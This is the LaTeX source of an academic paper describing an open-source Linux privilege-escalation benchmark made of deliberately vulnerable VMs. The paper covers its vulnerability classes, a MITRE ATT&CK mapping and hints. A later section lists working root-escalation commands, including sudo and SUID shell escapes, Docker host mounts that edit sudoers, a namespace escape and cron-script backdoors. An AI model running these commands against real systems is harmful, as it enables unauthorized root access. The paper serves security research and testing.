\documentclass{article} 

\usepackage{iclr2024_conference,times}
\iclrfinalcopy

\usepackage{xurl}
\usepackage{booktabs}
\usepackage{adjustbox}

\begin{document}

\title{Got Root? A Linux Priv-Esc Benchmark}


\author{Andreas Happe$^1$ and Jürgen Cito$^1$ \\
  $^1$TU Wien, Austria \\
  \texttt{\{andreas.happe, juergen.cito\}@tuwien.ac.at} \\
}
\maketitle

\begin{abstract}
Linux systems are integral to the infrastructure of modern computing environments, necessitating robust security measures to prevent unauthorized access. Privilege escalation attacks represent a significant threat, typically allowing attackers to elevate their privileges from an initial low-privilege account to the all-powerful \textit{root} account.
A benchmark set of vulnerable systems is of high importance to evaluate the effectiveness of privilege-escalation techniques performed by both humans and automated tooling. Analyzing their behavior allows defenders to better fortify their entrusted Linux systems and thus protect their infrastructure from potentially devastating attacks.
To address this gap, we developed a comprehensive benchmark for Linux privilege escalation. It provides a standardized platform to evaluate and compare the performance of human and synthetic actors, e.g., hacking scripts or automated tooling.
\end{abstract}

\section{Introduction}

Linux systems are integral to the infrastructure of modern computing environments, necessitating robust security measures to prevent unauthorized access. Privilege escalation attacks represent a significant threat, typically allowing attacker to elevate their privileges from an initial low-privilege account to the all-powerful \textit{root} account.

Privilege-Escalation attacks are typically performed manually by searching for exploitable configurations or vulnerable tools. The initial act of system reconnaissance, often named \textit{enumeration}, is often automated through usage of tools such as \textit{linpeas.sh}\footnote{\url{https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS}}. Exploitation itself is typically done manually through the, hopefully ethical, hacker.

A benchmark set of vulnerable systems is of high importance to evaluate the effectiveness of privilege-escalation techniques performed by both humans and automated tooling. Analyzing their behavior allows defenders to better fortify their entrusted Linux systems and thus protect their infrastructure from potentially devastating attacks.

\subsection{Requirements for the Benchmark}

The benchmark's use-case, i.e., testing the efficacy of malicious privilege escalation attacks against Linux systems, leads to unique requirements:

\begin{itemize}
    \item It should consist of Linux systems with provided low-privilege access, containing vulnerabilities that allow for root-level access.
    \item Given the sensitive use-case, i.e., attacking a system, the test-cases mandate strong security boundaries, i.e., should be placed within virtual machines (VMs) to protect the security of the host system. Using VMs additionally allows to include kernel-level vulnerabilities, e.g., \textit{DirtyC0W}\footnote{\url{https://github.com/firefart/dirtycow}}, without compromising the security of the host system.
    \item The test machines should be deployed within a local network. The machines itself should be able to be run ``air-gapped'', i.e., without internet connection. Running malicious tools over public networks, e.g., against cloud instances even when owned by the user themselves, is prohibited in some jurisdictions.
    \item Each VM should contain exactly a single vulnerability or attack path.
    \item The created virtual machines should be as extensible and transparent as possible, mandating both the usage and the release as open source.
\end{itemize}

\section{Building the Benchmark}
\label{priv_esc_benchmarks}

To the best of our knowledge, there exists no benchmark for evaluating Linux priv-esc capabilities fulfilling the stated requirements.

During pen-tester education, Capture-the-Flag Tournaments (CTFs) are often used. These are simulated test-cases, often placed within Virtual Machines, in which penetration-testers typically initially try to break in, and subsequently elevate their privileges to the root level. While these CTF machines would fulfill many of the stated requirements, they typically contain more than a single vulnerability. Thus, using these machines makes it difficult to assess the efficacy of automated tooling precisely for evaluation scenarios.

Training companies such as HackTheBox or TryHackMe provide cloud-based access to a steady stream of CTF machines. Those machines have two drawbacks: (1) the test machines are offered through the cloud and are thus not controllable by the evaluator nor fulfilling our security requirements, and (2) CTF challenge machines change or degrade over time. Nobody can guarantee that a challenge machine stays the same over time, hindering the reproducibility of results.

While being unsuited to be used directly, the CTF ecosystem provides invaluable information about potential attack classes through training material provided by the respective companies as well as through third-party ``walkthroughs'' detailing attacks against out-dated CTF machines.

To solve this, we designed a novel Linux priv-esc benchmark that can be executed locally, i.e., reproducible and air-gapped. To gain detailed insights into privilege-escalation capabilities we introduce distinct test-cases that allow reasoning about the feasibility of attackers' capabilities for each distinct vulnerability class.

\subsection{Vulnerability Classes}
\begin{table*}[t]
    \caption{Benchmark Test-Cases\label{tbl:testcases}}

    \begin{minipage}{\textwidth}
    \begin{adjustbox}{width=1\textwidth}
        \begin{tabular}{lll}
            \toprule
            Vulnerability-Class & Name & Description \\
            \midrule
            SUID/sudo files & suid-gtfo & exploiting \textit{suid} binaries \\
            SUID/sudo files & sudo-all & \textit{sudoers} allows execution of any command \\
            SUID/sudo files & sudo-gtfo & GTFO-bin in \textit{sudoers} file \\
            priv. groups/docker & docker & user is in docker group \\
            information disclosure & password reuse & root uses the same password as lowpriv \\
            information disclosure & weak password & root is using the password ``root'' \\
            information disclosure & password in file & there's a \textit{vacation.txt} in the user's home directory with the root password \\
            information disclosure & bash\_history & root password is in textit{.bash\_history} \\
            information disclosure & SSH key & \textit{lowpriv} can use key-bases SSH without password to become root \\
            cron-based & cron & file with write access is called through \textit{cron} as root \\
            cron-based & cron-wildcard & \textit{cron} backups the backup directory using wildcards \\
            cron-based & cron/visible & same as test-5 but with user-visible \textit{/var/run/cron} \\
            cron-based & cron-wildcard/visible & same as test-10 but with user accessible \textit{/var/spool/cron} \\
            \bottomrule
        \end{tabular}
    \end{adjustbox}
    \end{minipage}
\end{table*}

This section describes the selection process for our implemented vulnerabilities.

The benchmark consists of test cases, each of which allows the exploitation of a single specific vulnerability class. We based the vulnerability classes upon vulnerabilities typically abused during CTFs as well as on vulnerabilities covered by online priv-esc training platforms. Overall, we focused on configuration vulnerabilities, not exploits for specific software versions. Recent research~\cite{hackerswork} indicates that configuration vulnerabilities are often searched for manually while version-based exploits are often automatically detected. This indicates that improving the former would yield a larger real-world impact on pen-tester's productivity.

By analyzing TryHackMe's PrivEsc training module~\cite{thm_privesc}, we identified the following vulnerability classes.

\textbf{SUID and sudo-based vulnerabilities} are based upon misconfiguration: the attacker is allowed to execute binaries through \textit{sudo} or access binaries with set \textit{SUID bit} and through them elevate their privileges. Pen-Testers commonly search a collection of vulnerable binaries named GTFObins~\citep{gtfobins} to exploit these vulnerabilities. We do not implement advanced vulnerabilities that would need abusing the Unix ENV, shared libraries, or bash features such as custom functions.

\textbf{Cron-based vulnerabilities} were implemented both with attackers being able to view root's cron spool directory (to analyze exploitable crontabs) as well as with inaccessible crontabs where the attacker would have to derive that a script (named \textit{backup.cron.sh}) in their home directory is utilized by cron.

\textbf{Information Disclosure-based vulnerabilities} allow attackers to extract the root password from files such as stored text-files, SSH-Keys or the shell's history file.

After analyzing HackTheBox's Linux Privilege Escalation documentation~\citep{htb_privesc}, we opted to add a docker-based test-case which would include both \textbf{Privileged Groups} as well as \textbf{Docker vulnerabilities}.

We did not implement all of TryHackMe's vulnerabilities. We opted to not implement \textit{Weak File System permissions} as world-writable \textit{/etc/passwd} or \textit{/etc/shadow} files are not commonly encountered during this millennium anymore and similar vulnerability classes are already covered through the \textit{information-disclosure} test cases. \textit{NFS root squashing attacks} require the attacker to have root access to a dedicated attacker box which was deemed out-of-scope for the initial benchmark. \textit{Kernel Exploits} are already well covered by existing tooling, e.g., \textit{linux-exploit-suggester2}~\cite{linux_exploit_suggester}. In addition, kernel-level exploits are often unstable and introduce system instabilities and thus not well-suited for a benchmark. We opted not to implement \textit{Service Exploits} as this vulnerability was product-specific (\textit{mysql db}).

The resulting vulnerability test-cases are detailed in Table~\ref{tbl:testcases}. We discussed this selection with two professional penetration-testers who thought it to be representative of typical CTF challenges. The overall architecture of our benchmark allows the easy addition of further test-cases in the future.

\subsection{Mapping onto MITRE ATT\&CK}

\begin{table*}[t!]
    \caption{Mapping onto MITRE ATT\&CK\label{tbl:mitre}}
    \begin{minipage}{\textwidth}
    \begin{center}

    \begin{tabular}{lll}
        \toprule
        Name & Technique & Name \\
        \midrule
        vuln\_suid\_gtfo & T1548.001 & Setuid and Setgid\\
        vuln\_sudo\_no\_password & T1548.003 & Sudo and Sudo Caching \\
        vuln\_sudo\_gtfo &  T1548.003 & Sudo and Sudo Caching\\
        vuln\_docker & T1543.005 & Docker \\
        cron\_calling\_user\_file & T1053.003 & Cron \\
        root\_password\_reuse & T1110.001 & Password Guessing\\
                              & T1078.001 & Valid Account \\
        root\_password\_root & T1110.001 & Password Guessing\\
        file\_with\_root\_password & T1552.001 & Credentials in Files \\
                                   & T1078.001 & Valid Account \\
        vuln\_password\_in\_shell\_history & T1552.003 & Bash History \\
                                           & T1078.001 & Valid Account \\
        cron\_calling\_user\_wildcard & T1053.003 & Cron\\
        root\_allows\_lowpriv\_to\_ssh & T1552.004 & Private Keys \\
                                       & T1078.001 & Valid Account \\
        cron\_calling\_user\_file\_cron\_visible & T1053.003 & Cron \\
        cron\_calling\_user\_wildcard\_cron\_visible & T1053.003 & Cron \\
        \bottomrule
    \end{tabular}
    \end{center}
\end{minipage}
\end{table*}

MITRE ATT\&CK is ``is a knowledge base of cyber adversary behavior and taxonomy for adversarial actions across their lifecycle''\footnote{\url{https://attack.mitre.org/resources/faq/#other-models-faq}}, originally focusing Microsoft Windows Enterprise networks. Subsequent iterations also include Linux attack vectors.

Our benchmark consists of common attack paths, according to CTF documentation. In contrast, MITRE ATT\&CK is an unordered taxonomy of potential attack vectors. In Table~\ref{tbl:mitre}, benchmark cases are mapped upon their corresponding MITRE techniques.

\subsection{Adding Hints for Priming}

\begin{table*}[t!]
    \caption{Provided Hints for each Test-Case\label{tbl:hints}}
    \begin{minipage}{\textwidth}
    \begin{adjustbox}{width=1\textwidth}

    \begin{tabular}{ll}
        \toprule
        Name & Provided Hint \\
        \midrule
        vuln\_suid\_gtfo & there might be some exploitable suid binary on the system. \\
        vuln\_sudo\_no\_password & there might be a sudo misconfiguration.\\
        vuln\_sudo\_gtfo &  there might be some bad sudo binaries on the system.\\
        vuln\_docker & lowpriv is allowed to use docker. \\
        ron\_calling\_user\_file & /home/lowpriv/cron.sh is periodically called through cron as root. \\
        root\_password\_reuse & root might be reusing a password. \\
        root\_password\_root & root might be useing an insecure password. \\
        file\_with\_root\_password & the root password might be stored somewhere in the filesystem. \\
        vuln\_password\_in\_shell\_history & the root password might be in the bash history. \\
        cron\_calling\_user\_wildcard & home/lowpriv/backup is periodically backuped with tar through a cronjob as root. \\
        root\_allows\_lowpriv\_to\_ssh & there might be a reused ssh key lying around in the home directory. \\
        cron\_calling\_user\_file\_cron\_visible & there's a cronjob running a script as root in the system. \\
        cron\_calling\_user\_wildcard\_cron\_visible & there's a cronjob running a script as root in the system. \\
        \bottomrule
    \end{tabular}
\end{adjustbox}
\end{minipage}
\end{table*}

Recent research indicates that human hackers rely on intuition or checklists when searching for vulnerabilities~\cite{hackerswork}. The mentioned checklists often consist of different vulnerability classes to test.

To allow emulation of this manual process, we introduce optional \textit{hints} to each test case in our benchmark that emulate going through a vulnerability class checklist, e.g., the hint for \textit{sudo binaries} is ``\textit{there might be a sudo misconfiguration}''. The hints are about the vulnerability class, not about a concrete vulnerability. Iterating through multiple hints would thus emulate a human going through a checklist of vulnerability classes. Currently implemented hints are provided in Table~\ref{tbl:hints}.

\subsection{Benchmark Implementation}

To allow for extensibility the benchmark was implemented using well-known Unix administration tools. The virtual machines are provisioned using the \textit{Vagrant} and are based on standard \textit{Debian GNU/Linux} distributions. Vulnerabilities are introduced into each VM using \textit{Ansible} automation scripts. \textit{Ansible} is also used to prepare a low-privilege account (``lowpriv'') and high-level account (``root'') with a standard password.

\section{Insights into the Benchmark}

After describing the selection process and composition of the benchmark, we elaborate further upon the benchmark itself and incorporate feedback from professional penetration testers.

\subsection{Enumeration vs. Exploitation}

During the enumeration phase of an attack, system information is gathered and used to identify potential vulnerable configurations and components that are subsequently targeted through attacks. Penetration testers commonly stress the importance of system enumeration for successful penetration testing.

Anecdotally speaking, the time effort to enumerate a system and subsequently identify a potential attack vector far supersedes the time effort for exploitation.

Automation in Linux privilege-escalation scenarios is focused on making system enumeration more efficient. Tools such as \textit{linpeas.sh} automate the often tedious tasks of gathering system information. Analysis of the gathered information as well as its exploitation is typically performed manually.

This is a difference to the Windows-Ecosystem where attack tooling oftentimes combines enumeration and exploitation, e.g., tools such as \textit{PowerUp.ps1} or \textit{SharpUp} allow to both detect as well as exploit misconfiguration.

\subsection{Single- vs. Multi-Step Exploitation}
\label{potential_exploits}

When analysing the potential exploitation of the vulnerabilities contained within the benchmark, two distinct classes arise.

The first class consists of \textit{Single-Step Exploits}, i.e., vulnerabilities that can be exploited by giving a single command after successful identification in the enumeration phase. Example vulnerabilities and their respective exploitation are shown in Table~\ref{exploits}.

\begin{table*}[t!]
    \caption{Example exploitation commands.\label{exploits}}

\begin{center}
    \begin{adjustbox}{width=1\textwidth}
\begin{tabular}{ll}
    \toprule
    Name & Potential exploit \\
    \midrule
    vuln\_suid\_gtfo & \textit{python3.11 -c 'import os; os.execl("/bin/shp", "sh" "-p")'} \\
                     & \textit{find / -exec /bin/sh -p \;} \\
    vuln\_sudo\_no\_password & \textit{sudo -i} \\
    vuln\_sudo\_gtfo & \textit{sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh}\\
    root\_password\_reuse & \textit{test credentials root:trustno1} \\
    root\_password\_root & \textit{test credentials root:root} \\
    file\_with\_root\_password & \textit{cat /home/lowpriv/vacation.txt; test\_credentials root password} \\
    vuln\_password\_in\_shell\_history & \textit{cat /home/lowpriv/.bash\_history; test\_credentials root password} \\
    root\_allows\_lowpriv\_to\_ssh & \textit{ssh -o StrictHostKeyChecking=no root@localhost} \\
    \bottomrule
\end{tabular}
\end{adjustbox}
\end{center}
\end{table*}

In contrast, \textit{Multi-Step Exploits} warrant the execution of multiple steps. Each step depends on the successful execution of all prior steps. One example of such a vulnerability would be the \textit{vuln\_docker} test-case in which the low-priv user is allowed to execute high-privileged Docker containers. In such a scenario, the attacker would initially start a new container that mounts the host filesystem with write access and subsequently modify the host filesystem to give the use elevated access rights. We show an example of such an exploit in the following.

\begin{verbatim}
 # mount and switch to host filesystem within the
 # container at /host
$ docker run -it -v /:/host alpine chroot /host bash

# add the lowpriv user to the host /etc/suderos file
# (which allows lowpriv to execute commands on the host
# as root
$ echo "lowpriv ALL=(ALL:ALL) ALL" >> /host/etc/sudoers

# exit the container
$ exit

# execute command as root
$ sudo bash
\end{verbatim}

Please note, that the same scenario could be executed using a single-step exploitation when abusing missing namespace separations:

\begin{verbatim}
# escape the namespace by using the host process
# namespace, esp. by switching into the namespace
# of process 1 (init) which always runs as root on
# a linux system.
$ docker run -it --privileged --ns=host alpine nsenter
                 --target 1 --mount
                 --uts --ipcs --net --pid -- bash
\end{verbatim}

The benchmark suite also includes multiple scenarios utilizing timed tasks, i.e., \textit{cron} tasks, in Linux systems. While the prior multi-step exploitation examples had a causal ordering, cron-based exploits also include a temporal component: in an initial step, the attacker places malicious code that will subsequently be called by the cron process with elevated privileges. When this malicious code is executed, it changes the system configuration and creates a backdoor that allows the attacker to elevate their privileges. The attacker typically has to periodically check if the malicious code has already been executed and try to elevate their privileges. Oftentimes, the attacker does not know when or if the malicious code is executed, but has to use educated guesses about potential execution times, e.g., that a backup script will typically be called outside of typical office hours.

The scenario \textit{cron\_calling\_user\_file} or \textit{cron\_calling\_user\_file\_cron\_visible} could be abused by the following commands:

\begin{verbatim}
# place code that adds a new suid binary to the system
# when called through cron
echo '#!/bin/bash\ncp /usr/bin/bash \\
        /home/bash\nchmod +s /home/bash"' \\
        > /home/lowpriv/backup.cron.sh

# alternative: resetting the root password when called through cron
echo '#!/bin/bash\necho "trustno1" | passwd' > \\
        /home/lowpriv/backup.cron.sh
\end{verbatim}

In those examples, the attacker has to wait until the cron job is executed, typically this ranges from minutes in CTFs to hours in real-life systems. Only after the cron command has been executed, the backdoor is inserted into the system, and the attacker can subsequently abuse that backdoor to elevate their privileges.

\section{Conclusion}

We curated a new Linux privilege escalation benchmark and elaborated on the decisions that led to its creation. We further detail particularities about the enumeration and exploitation of Linux-based systems that are mirrored within our benchmark.

As the benchmark is released as open-source on GitHub, and through the usage of standard Linux system administration tools, we enable third-parties to easily extend the benchmark with additional attack classes or more scenarios for our initially identified attack classes.

\section*{Data Availability}

The benchmark suite has been published at \url{github.com/ipa-lab/benchmark-privesc-linux}.

\bibliographystyle{plainnat}
\bibliography{bib}
    
\end{document}